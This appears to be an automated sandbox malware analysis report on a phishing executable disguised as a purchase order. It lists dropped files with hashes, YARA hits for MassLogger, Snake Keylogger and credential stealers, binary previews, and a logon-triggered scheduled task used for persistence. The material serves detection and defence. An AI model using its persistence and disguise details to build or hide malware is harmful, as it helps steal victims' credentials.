                                                                                                                                                                                                                                    SHA-512:258C2F01FDF256E0A4D4A726F30F33FB2D1A2AC7854E64CBBCA1941168BD658E50CA7CA8976EA22722B1E4CF8F0A93B0E12162DF90559C3093D4604291231358
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):98816
                                                                                                                                                                                                                                    Entropy (8bit):5.666546286050177
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:qwa4JaIFveZKGAmwJVeDhp0dqnjErVf4UMR7pspNYZd:24Jj4ZKGHwJVeDDKqnj6bMDspNC
                                                                                                                                                                                                                                    MD5:F6B8018A27BCDBAA35778849B586D31B
                                                                                                                                                                                                                                    SHA1:81BDE9535B07E103F89F6AEABDB873D7E35816C2
                                                                                                                                                                                                                                    SHA-256:DDC6B2BD4382D1AE45BEE8F3C4BB19BD20933A55BDF5C2E76C8D6C46BC1516CE
                                                                                                                                                                                                                                    SHA-512:AA958D22952D27BAD1C0D3C9D08DDBF364274363D5359791B7B06A5D5D91A21F57E9C9E1079F3F95D7CE5828DCD3E79914FF2BD836F347B5734151D668D935DE
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown
                                                                                                                                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nH...............P..x............... ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...................Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....*&..( ....*.s!........s"........s#........s$........s%........*Z........o8...........*&..(9....*&........*".......*Vs....(B...t.........*..(C...*"~....+.*"~....+.*"~....+.*"~....+.*"~....+.*b.r...p.oa...(....(@....*:.~.....o....&*.*:.(P....(Q....*..~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):70656
                                                                                                                                                                                                                                    Entropy (8bit):4.910353963160109
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
                                                                                                                                                                                                                                    MD5:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                    SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
                                                                                                                                                                                                                                    SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                                                                                                                                                                                                                                    SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1574
                                                                                                                                                                                                                                    Entropy (8bit):5.119325427481331
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaMxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTpv
                                                                                                                                                                                                                                    MD5:AC951B1982966F297E668C6516A963F8
                                                                                                                                                                                                                                    SHA1:180DAE72436F545D9C7466545FD28A6D2984E125
                                                                                                                                                                                                                                    SHA-256:E687256FF641EFAB24BD81204DBA991BD0B6B696503508CFA3C9EB37E16CB904
                                                                                                                                                                                                                                    SHA-512:205BF841879EF09214C63BAB5CE1E119980E8FB8E4A4B784E90EEFB8C6B094F48D809C7C9F8E101D47AD16416F1DDF2C2E0DEC045792386BAEB725AFEB1C9CA5
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\zeXKjViL.exe
                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1574
                                                                                                                                                                                                                                    Entropy (8bit):5.119325427481331
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaMxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTpv
                                                                                                                                                                                                                                    MD5:AC951B1982966F297E668C6516A963F8
                                                                                                                                                                                                                                    SHA1:180DAE72436F545D9C7466545FD28A6D2984E125
                                                                                                                                                                                                                                    SHA-256:E687256FF641EFAB24BD81204DBA991BD0B6B696503508CFA3C9EB37E16CB904
                                                                                                                                                                                                                                    SHA-512:205BF841879EF09214C63BAB5CE1E119980E8FB8E4A4B784E90EEFB8C6B094F48D809C7C9F8E101D47AD16416F1DDF2C2E0DEC045792386BAEB725AFEB1C9CA5
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):665670656
                                                                                                                                                                                                                                    Entropy (8bit):7.9999993515437415
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:B4B82042C00E471AC2399BADB63F1C10
                                                                                                                                                                                                                                    SHA1:CEEE064C841E11897E2EC0C1D013CC5465B32A16
                                                                                                                                                                                                                                    SHA-256:7C6B6B9502BF766DD63F0E51191FDA8A9016419A1A7A870081A8304EF1D573F8
                                                                                                                                                                                                                                    SHA-512:99E9116807A9B3574A1D90DF02202C46ADD06D821A710D1F28E72EA03434A1A38812ADFE6156DF28C2A484AC51CD5E4489A7F19B5D44D806EC1559AB16B56D6B
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1814
                                                                                                                                                                                                                                    Entropy (8bit):2.4077982732154424
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:8rsXowAOcQ/tz0/CSL4WWeMNDyWlT9gRKQ17+AUvO4Zv7L1Q17+ANTCNfBT/v4tK:8ILDWLqeMNmG9g9R+O4ZvPqRgpdqy
                                                                                                                                                                                                                                    MD5:0AA0FF9E058C3DE507C59168AE9CFD3D
                                                                                                                                                                                                                                    SHA1:CB8097303EAB96960C2B79ACDD235D24B48149F4
                                                                                                                                                                                                                                    SHA-256:5AA15DE045A571F79B2F70D1A91AAA79BD09E62508814B664DAAAE58201C8BEC
                                                                                                                                                                                                                                    SHA-512:CB7A0659691835C412D17E49630CC2077BC8660DB2C93E393A1660C35ABF18E1B34FC24B7434EAB303B13634E6675DCC169F1112A5A4030B2AF6066DE5726762
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:L..................F.@......................................................1....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....T.1...........ACCApi..>............................................A.C.C.A.p.i.....b.2...........apihost.exe.H............................................a.p.i.h.o.s.t...e.x.e.........A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.3.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe.....................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):12320
                                                                                                                                                                                                                                    Entropy (8bit):7.983502184449185
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:L3uzqKEwnD/9OCBzSdaHXCtw35OnXPs23deGDAjVLPvQKVa070wYLdLssOV:LjKE09O9U3i0cs2NTKLPvQKVa070wS0
                                                                                                                                                                                                                                    MD5:595E5314136DC3E7295955EF0469E1C5
                                                                                                                                                                                                                                    SHA1:A6A60EAC0C147EF7A51793C350F082F0540145D4
                                                                                                                                                                                                                                    SHA-256:B5F050F36595C91271070095CA06D6A40A56CED7B935CAF7C42B8EAAD06A905F
                                                                                                                                                                                                                                    SHA-512:436A25AFCE0AD2CB5C7712DA01E4ACD028253016540D5BDFDBEE3A7D2618C29194AB2F54D5FCF40883B9D7448599154745E85DAA227540B3AEFF4909F3D0DE0D
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
